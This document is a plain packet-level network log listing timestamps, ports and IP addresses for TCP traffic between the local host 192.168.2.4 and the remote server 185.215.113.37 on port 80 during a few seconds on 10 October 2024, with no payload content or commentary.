Oct 10, 2024 18:23:11.856235027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.856247902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.856264114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.856307030 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.856374025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.881648064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881665945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881679058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881716013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881793976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881807089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881870985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881956100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881968021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881979942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881990910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.881989956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882004023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882133007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882138968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882198095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882208109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882210970 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882297039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882308006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882319927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882329941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882342100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882389069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882407904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882488966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882499933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882510900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882519960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882538080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882569075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882637978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882647038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882683039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882725000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882735968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882747889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882760048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882766962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882771969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882782936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.882800102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.882826090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883023977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883034945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883045912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883050919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883064032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883068085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883069992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883078098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883086920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883100033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883138895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883333921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883344889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883357048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883367062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883377075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883380890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883397102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883403063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883413076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883421898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883423090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883457899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883646965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883657932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883673906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883683920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883696079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883697033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883708000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883718967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883728981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883734941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883735895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.883759022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883759022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.883800030 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884087086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884098053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884110928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884120941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884130955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884133101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884145021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884155989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884166002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884188890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884371996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884383917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884394884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884413958 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884430885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884495020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884506941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884516954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884527922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884540081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884546995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884551048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884562016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884572029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884572983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884583950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884593010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884594917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.884617090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.884637117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.927469015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927495003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927506924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927517891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927527905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927539110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927548885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927558899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927570105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927578926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927588940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927598953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927607059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.927608013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927619934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927630901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927643061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927654028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927660942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.927664042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927675009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927686930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927696943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927699089 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.927709103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.927725077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.927761078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.947474003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.947618961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:12.315742016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:12.315788031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:12.320688963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:12.320703983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:12.320724964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:12.320735931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:12.320744991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.051809072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.052073002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:13.196525097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:13.196525097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:13.201432943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.201642036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.201991081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.931143045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:13.931212902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:13.946635962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:13.952754021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:14.670773029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:14.670874119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:15.076569080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:15.081480980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:15.804219007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:15.804367065 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.044790030 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.049604893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265424967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265460968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265472889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265506983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265517950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265532970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265544891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265646935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.265646935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.265726089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265738010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265757084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265774012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265788078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.265793085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.265793085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.266834021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389363050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389415026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389455080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389487028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389550924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389565945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389585018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389585018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389604092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389604092 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389615059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389638901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389657974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389686108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389695883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389725924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389775038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389785051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389801979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389803886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389820099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389823914 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389837027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389852047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389889956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389921904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.389950991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.389987946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390022993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390037060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390054941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390054941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390069962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390081882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390281916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390295982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390312910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390314102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390328884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390343904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390357971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390362978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390372992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390376091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390387058 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390402079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390418053 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390419960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390436888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390450954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.390492916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.390523911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.514579058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514611006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514625072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514746904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514760971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514781952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514786959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514806032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.514869928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.514874935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.514903069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.514985085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515005112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515021086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515021086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515037060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515041113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515047073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515059948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515063047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515073061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515079021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515096903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515124083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515285015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515324116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515419006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515429974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515444040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515459061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515461922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515475988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515485048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515491009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515505075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515511036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515515089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515536070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515537024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515538931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515542984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.515556097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.515583038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516062021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516072989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516089916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516098976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516102076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516119957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516133070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516133070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516149998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516159058 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516161919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516177893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516179085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516191959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516200066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516208887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516217947 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516220093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516237974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516242981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516251087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516268015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516268969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516280890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516293049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516297102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516311884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.516318083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.516341925 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638587952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638616085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638633013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638705015 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638709068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638719082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638739109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638746977 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638762951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638787031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638789892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638798952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638817072 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638818026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638832092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638837099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638854027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638873100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638916969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638931036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.638946056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.638964891 CEST	49731	80	192.168.2.4	185.215.113.37
